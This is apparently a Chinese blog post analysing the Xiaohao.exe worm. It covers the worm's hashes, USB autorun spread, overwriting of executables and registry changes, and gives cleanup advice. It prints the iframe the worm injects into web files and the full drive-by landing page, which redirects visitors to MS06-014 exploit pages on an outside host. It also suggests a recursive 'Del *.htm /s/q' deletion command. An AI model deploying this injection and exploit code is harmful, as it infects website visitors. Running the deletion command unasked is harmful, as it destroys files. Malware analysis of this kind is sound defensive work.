文件名称:Xiaohao.exe
文件大小:12288 bytes
AV命名:Virus.Win32.Agent.o(瑞星)
加壳方式:UPX 0.89.6 - 1.02 / 1.05 - 1.24
编写语言:Microsoft Visual C++ 6.0
病毒类型:蠕虫
文件MD5:B50ED06B61CDCF060D0136784999E50C
文件SHA1:ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
传播方式:U盘等移动介质、网页漏洞。
1、释放病毒文件:
%Systemroot%/system32/dllcache/dvdplay.exe
%Systemroot%/system32/OLDA.tmp
%Systemroot%/system32/exloroe.exe
其中主体Xiaohao.exe常驻进程。
2、尝试启动C:/Program Files/Internet Explorer/iexplore.exe,不过未见其他行为。
3、Xiaohao.exe查找可用的磁盘,在其目录下生成:Xiaohao.exe和Autorun.inf
如双击磁盘,则激活病毒。
(如果在插入U盘情况下,运行被感染的病毒,那么U盘目录会生成Xiaohao.exe和Autorun.inf)
4、遍历磁盘所有文件,如遇到.exe文件则覆盖,并在文件尾增加感染标记“ygr”
覆盖文件头部,导致可执行文件结构被破坏。文件全部变成一个“浩”字。
由于无判断路径,系统文件也被破坏了,重启后可能无法开机。
并且一些系统设置和配置失效,例如系统时间会被修改。
5、查找扩展名为*.jsp、*.php、*.aspx、*.asp、*.html、*.htm文件。插入一段代码:
<ifrae src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0></ifram>
代码:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>IE 0Day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
function detectOS()
{
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
{
OS = "Windows XP";
}
else
{
if(navigator.userAgent.indexOf("Windows NT 5.2") != -1)
{OS = "Windows 2003";}
else
{OS = "Windows 2000";}
}
return OS;
}
function MakeItSo()
{
if(detectOS() == "Windows XP")
{
//2YWwO5M3N*xp,V4PPxp5DMS07-004MxBm
window.location.href="baobao.htm";
}
else {if(detectOS() == "Windows 2003")
{
//2YWwO5M3N*2003
window.location.href="zhu3.htm";
}
else
{
//2YWwO5M3N*2K,V4PP2K5DMS07-004MxBm
window.location.href="banner.htm";
}
}
}
</SCRIPT>
<SCRIPT language=VBScript>
on error resume next
Set downf = document.createElement("object")
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"
str="Microsoft.XMLHTTP"
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
err.clear
//C;SPMS06-014B)64,5Ck:sEP6O2YWwO5M3@`PMV4PP2;M,5DMS07-004MxBm
document.write("<scr"&"ipt language=""javascript"">window.setTimeout(""MakeItSo()"",5000);</sc"&"ript>")
else
//SPMS06-014B)64,V4PP06-0145DMxBmad.htm
document.write("<iframe width=""0"" height=""0"" src=""zhu3.htm""></iframe>")
end if
</SCRIPT>
<script src=yun.js></script>
<SCRIPT language=javascript type=text/javascript>
var cookieString = document.cookie;
var start = cookieString.indexOf("woshi0day=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();
document.write("<iframe width=0 height=0 src=baobao.htm></iframe>");
}</SCRIPT>
</BODY></HTML>
由操作系统版本判断,决定跳转的网页。
首先检测是否存在MS06-014漏洞,若有,则跳至h**p://xiaohao.yona.biz/zhu3.htm
如无意外,可获样本:h**p://xiaohao.yona.biz/xiaohao.exe(就是那个主角拉``)
若无MS06-014漏洞,则跳至h**p://xiaohao.yona.biz/baobao.htm.
代码以十进制加密```解密后得一只0day,应该是ANI的马``=。=
连接已失效``(晕)
时间关系,不深入分析咧```=。=
6、修改注册表(不记得哪里,哈哈``),删除开始菜单的快捷方式。
7、修改进程窗口标题,为:已中毒 X14o-H4o's Virus
8、如病毒在进程,在进入一个目录后,所有文件(被感染文件除外)属性皆被设置为隐藏!
9、破坏显示隐藏文件,设置为“不显示”。
10、写入注册表,开机自启:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Active Setup/Installed Components/
指向%SystemRoot%/system32/exloroe.exe
(汗,这一步绝对多余了,因为系统根本启动不了!)
11、保存被感染的文件列表,则C:/Jilu.txt
狂汗``有1M多!
没有解决方法哈```重启后系统不能启动,呵呵
只能重装``
1、C盘格掉,重装系统后,删除每个磁盘下的Xiaohao.exe和Autorun.inf。
记住,不要双击进入啊,不然一切又白费了,建议用Winrar或CMD下删除。
2、不要运行C盘外的任何程序,直接网上下载杀毒软件,升级之``全盘扫
3、还有那些被插代码的网页文件。。
由于是重装,系统补丁没打``如果不小心运行,可能病毒又来了`` T T
可以下载个批量删除代码的工具哈``杀软也应该可以吧?
或者干脆:
Del *.htm /s/q
*.htm自己换成其他网页格式文件哈。
===========================================
也可以在DOS下用光盘杀毒啊,前提是杀软能识别。
===========================================
PS:
这种病毒破坏性非常大,建议打齐系统补丁,及时升级杀软!!
杀软如有主动防御功能更好``没有的话,去下个HIPS辅助``
还有```不明的网站就不要进拉~~
1564
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
